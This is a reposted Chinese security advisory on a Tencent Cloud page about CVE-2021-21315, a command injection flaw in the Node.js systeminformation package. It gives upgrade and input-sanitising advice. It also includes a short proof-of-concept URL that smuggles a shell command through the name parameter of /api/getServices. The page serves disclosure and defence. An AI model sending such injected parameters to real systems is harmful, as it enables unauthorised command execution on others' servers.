Loading [MathJax]/jax/output/CommonHTML/config.js
文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
首页
学习
活动
专区
圈层
工具
MCP广场
返回腾讯云官网
社区首页 >专栏 >Node.js命令注入漏洞(CVE-2021-21315-POC)

Node.js命令注入漏洞(CVE-2021-21315-POC)

作者头像
Khan安全团队
发布于 2021-03-10 07:37:50
发布于 2021-03-10 07:37:50
1.9K00
代码可运行
举报
文章被收录于专栏:Khan安全团队Khan安全团队
运行总次数:0
代码可运行
关联问题
换一批

Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315)攻击者可以通过「systeminformation」中代码注入漏洞的存在意味着攻击者可以通过在组件使用的未初始化参数内小心翼翼地注入有效载荷来执行系统命令。

POC:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
[PoC][Victim Site]/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt)[Victim Site]/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)

目前该漏洞已经修复,将systeminformation及时升级到5.3.1或更高版本。

https://www.npmjs.com/package/systeminformation

缓解措施

如果无法升级,可以检查或清理传递给si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad()的参数,只允许使用string,拒绝任何数组。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-03-03,如有侵权请联系 cloudcommunity@tencent.com 删除
python
安全
网络安全

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

python
安全
网络安全
评论
登录后参与评论
暂无评论
登录 后参与评论
推荐阅读
编辑精选文章
换一批
万字详解高可用架构设计
4666
Go 开发者必备:Protocol Buffers 入门指南
2873
10分钟带你彻底搞懂分布式链路跟踪
2042
多租户的 4 种常用方案
4110
亿级月活的社交 APP,陌陌如何做到 3 分钟定位故障?
2931
60页PPT全解:DeepSeek系列论文技术要点整理
4228
Node.js 严重漏洞使数百万系统面临 RCE 攻击
网络安全漏洞
在广泛使用的Node.js包“systeminformation”中发现了一个严重的安全漏洞,可能会使数百万个系统面临远程代码执行 (RCE) 攻击。
星尘安全
2024/12/25
3870
Node.js 严重漏洞使数百万系统面临 RCE 攻击
git-interface@2.1.1 中的命令注入漏洞
httpsgitgithub开源安全
git-interface将自己描述为与 node.js 中的 git 存储库一起使用的接口
洛米唯熊
2022/05/29
4790
漏洞情报|Apache Tomcat WebSocket拒绝服务漏洞PoC公开风险通告(CVE-2020-13935)
tomcatapache网站socket编程网络安全
近日,腾讯云安全运营中心监测到,Apache Tomcat WebSocket拒绝服务漏洞(漏洞编号:CVE-2020-13935)PoC已公开,Apache官方在2020年7月14日披露了该漏洞,腾讯云已关注到并发布了风险通告。 本次通告标识漏洞利用工具已公开,为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞详情 Apache Tomcat WebSocket拒绝服务漏洞是由于WebSocket帧中的攻击载荷长度未正确验证导致,
云鼎实验室
2020/11/09
1.8K0
java框架漏洞_Spring 框架漏洞集合「建议收藏」
网络安全安全xmlphpspring
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。
全栈程序员站长
2022/09/08
2.2K0
KDE4/5 命令执行漏洞 (CVE-2019-14744) 简析
安全https网络安全
KDE Frameworks是一套由KDE社群所编写的库及软件框架,是KDE Plasma 5及KDE Applications 5的基础,并使用GNU通用公共许可证进行发布。其中所包含的多个独立框架提供了各种常用的功能,包括了硬件集成、文件格式支持、控件、绘图功能、拼写检查等。KDE框架目前被几个Linux发行版所采用,包括了Kubuntu、OpenMandriva、openSUSE和OpenMandriva。
Seebug漏洞平台
2019/08/14
5600
KDE4/5 命令执行漏洞 (CVE-2019-14744) 简析
漏洞情报|Node.js通过DNS请求实现拒绝服务漏洞风险通告(CVE-2020-8277)
node.jsdnshttps网络安全安全
近日,腾讯云安全运营中心监测到,Node.js 官方发布安全更新,修复了一个拒绝服务漏洞(漏洞编号:CVE-2020-8277),攻击者可通过DNS请求来触发拒绝服务。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞详情 受影响版本的 Node.js 应用程序允许攻击者对其选择的主机触发DNS请求,攻击者可通过使该应用程序解析具有大量响应的DNS记录来触发拒绝服务。 风险等级 高风险 漏洞风险 攻击者可通过触发大量DNS请求来实现
云鼎实验室
2020/11/17
7220
安恒信息提示漏洞:CVE-2014-6271 bash远程命令执行漏洞
bashlinuxubuntu
今日爆出CVE-2014-6271 bash远程命令执行漏洞。bash是Linux用户广泛使用的一款用于控制命令提示符工具,导致该漏洞影响范围甚广。同时,当HTTP服务开放CGI服务或其他地方引用bash时可直接导致远程命令执行漏洞。主要影响系统为ubuntu centos debian suse readhat等主流linux操作系统。漏洞危害主要表现在:影响基于bash开放的服务、程序。当网站利用CGI执行bash后可导致攻击者远程执行系统命令,从而可以利用系统命令反弹shell之后进行内网渗透、挂马、
安恒信息
2018/04/10
1.3K0
【漏洞通告】WebSphere XML外部实体(XXE)注入漏洞(CVE-2021-20453/CVE-2021-20454)
网站网络安全安全xmlnode.js
近日,绿盟科技监测到IBM发布安全公告修复了两个WebSphere Application Server XML外部实体(XXE)注入漏洞(CVE-2021-20453/CVE-2021-20454),由于WAS在处理XML数据时容易受到XML外部实体注入(XXE)攻击。远程攻击者可利用漏洞获取敏感信息或消耗内存资源。请相关用户采取措施进行防护。
绿盟科技安全情报
2021/04/26
7780
【漏洞通告】WebSphere XML外部实体(XXE)注入漏洞(CVE-2021-20453/CVE-2021-20454)
CVE-2020-15778 Openssh-SCP 命令注入漏洞复现报告
安全网络安全机器学习神经网络深度学习
漏洞描述:OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。
字节脉搏实验室
2020/08/17
3.7K0
CVE-2020-15778 Openssh-SCP 命令注入漏洞复现报告
KDE4/5 命令执行漏洞 (CVE-2019-14744) 简析
网络安全安全
KDE Frameworks是一套由KDE社群所编写的库及软件框架,是KDE Plasma 5及KDE Applications 5的基础,并使用GNU通用公共许可证进行发布。其中所包含的多个独立框架提供了各种常用的功能,包括了硬件集成、文件格式支持、控件、绘图功能、拼写检查等。KDE框架目前被几个Linux发行版所采用,包括了Kubuntu、OpenMandriva、openSUSE和OpenMandriva。
知道创宇云安全
2019/08/12
5640
KDE4/5 命令执行漏洞 (CVE-2019-14744) 简析
CVE-2024-20931:Weblogic JNDI注入远程命令执行漏洞
weblogic工具漏洞协议jndi
WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
Timeline Sec
2024/07/16
2.1K0
CVE-2024-20931:Weblogic JNDI注入远程命令执行漏洞
常见的Web漏洞之命令注入
安全网络安全网站黑客编程算法
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2022/01/24
2K0
常见的Web漏洞之命令注入
S2-061 Struts2远程代码执行漏洞复现 (POC详解)
struts2编码对象漏洞安全
Struts2是一个用Java编写的开源MVC Web应用框架,Struts也是一个中间件,它可以连接不同的系统和服务。
红队蓝军
2024/07/02
1.2K0
S2-061 Struts2远程代码执行漏洞复现 (POC详解)
【紧急漏洞】Linux polkit本地权限提升漏洞(CVE-2021-4034)POC复现过程与修复方法
网络安全安全centoslinux
也可以手动下载polkit-0.112-26.el7_9.1.x86_64.rpm进行rpm -Uvh修复
yuanfan2012
2022/03/31
2.8K0
【紧急漏洞】Linux polkit本地权限提升漏洞(CVE-2021-4034)POC复现过程与修复方法
分解 - 命令注入
linuxphp网络安全安全命令行工具
命令注入或操作系统命令注入是一类注入漏洞,攻击者能够进一步利用未经处理的用户输入在服务器中运行默认的操作系统命令。
Khan安全团队
2022/01/12
1.2K0
CVE-2024-3721|TBK DVR硬盘录像机命令注入漏洞(POC)
集合监控漏洞系统存储
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采⽤硬盘录像,故常常被称为硬盘录像机,也被称为DVR。
信安百科
2024/04/22
7740
CVE-2024-3721|TBK DVR硬盘录像机命令注入漏洞(POC)
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
https安全git容器镜像服务网络安全
GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行,可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解,漏洞编号CVE-2021-22205。
亿人安全
2022/06/30
7.8K1
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
使用 Elastic Security 检测 CVE-2021-44228 (log4j2) 的漏洞利用
Elasticsearch Service
这篇博文提供了 CVE-2021-44228 的摘要,并为 Elastic Security 用户提供了检测,以发现他们环境中对该漏洞的主动利用。
点火三周
2021/12/11
5.1K0
使用 Elastic Security 检测 CVE-2021-44228 (log4j2) 的漏洞利用
CVE-2021-29505:XStream反序列化命令执行漏洞复现
文件存储xml安全httpsshell
XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。
Timeline Sec
2021/06/25
3.4K0
渗透专题丨web Top10 漏洞简述(2)
网络安全
程序在引用文件的时,引用的文件名,用户可控的情况,传入的文件名校验不严,从而操作了预想之外的文件,就有可能导致文件泄漏和恶意的代码注入。这是因为程序开发时候会把重复使用的函数写到归档在一起,用到哪个函数就可以直接进行调用,而为了代码更灵活,包含的文件会被设置为变量动态调用,这里就容易造成文件包含漏洞。
极安御信安全研究院
2023/06/14
4480
渗透专题丨web Top10 漏洞简述(2)
推荐阅读
编辑精选文章
万字详解高可用架构设计Go 开发者必备:Protocol Buffers 入门指南10分钟带你彻底搞懂分布式链路跟踪
相关讨论
请问网站的SQL注入漏洞能扫描得到吗?bugly检测出SQL注入漏洞,能修复一下吗?XXL-JOB远程命令执行漏洞 在那里修改呢?
相关课程
腾讯云向量数据库-RAG七天入门训练营前端ES Serverless一站式日志分析入门到精通
Node.js 严重漏洞使数百万系统面临 RCE 攻击
3870
git-interface@2.1.1 中的命令注入漏洞
4790
漏洞情报|Apache Tomcat WebSocket拒绝服务漏洞PoC公开风险通告(CVE-2020-13935)
1.8K0
java框架漏洞_Spring 框架漏洞集合「建议收藏」
2.2K0
KDE4/5 命令执行漏洞 (CVE-2019-14744) 简析
5600
漏洞情报|Node.js通过DNS请求实现拒绝服务漏洞风险通告(CVE-2020-8277)
7220
安恒信息提示漏洞:CVE-2014-6271 bash远程命令执行漏洞
1.3K0
【漏洞通告】WebSphere XML外部实体(XXE)注入漏洞(CVE-2021-20453/CVE-2021-20454)
7780
CVE-2020-15778 Openssh-SCP 命令注入漏洞复现报告
3.7K0
KDE4/5 命令执行漏洞 (CVE-2019-14744) 简析
5640
CVE-2024-20931:Weblogic JNDI注入远程命令执行漏洞
2.1K0
常见的Web漏洞之命令注入
2K0
S2-061 Struts2远程代码执行漏洞复现 (POC详解)
1.2K0
【紧急漏洞】Linux polkit本地权限提升漏洞(CVE-2021-4034)POC复现过程与修复方法
2.8K0
分解 - 命令注入
1.2K0
CVE-2024-3721|TBK DVR硬盘录像机命令注入漏洞(POC)
7740
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
7.8K1
使用 Elastic Security 检测 CVE-2021-44228 (log4j2) 的漏洞利用
5.1K0
CVE-2021-29505:XStream反序列化命令执行漏洞复现
3.4K0
渗透专题丨web Top10 漏洞简述(2)
4480
相关推荐
Node.js 严重漏洞使数百万系统面临 RCE 攻击
更多 >
Khan安全团队0
LV.7
Khan安全信息科技有限公司CTO
文章
918
获赞
2.1K
排名
681
专栏
2
作者相关精选
换一批
交个朋友
加入腾讯云官网粉丝站
蹲全网底价单品 享第一手活动信息
加入讨论
的问答专区 >
Delphi Shen0
相关课程
一站式学习中心 >
腾讯云向量数据库-RAG七天入门训练营
2202人在学
向量数据库
腾讯云安灯
ES Serverless一站式日志分析入门到精通
1189人在学
Elasticsearch Service
大数据
568人在学
大数据
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2025 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论
1
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验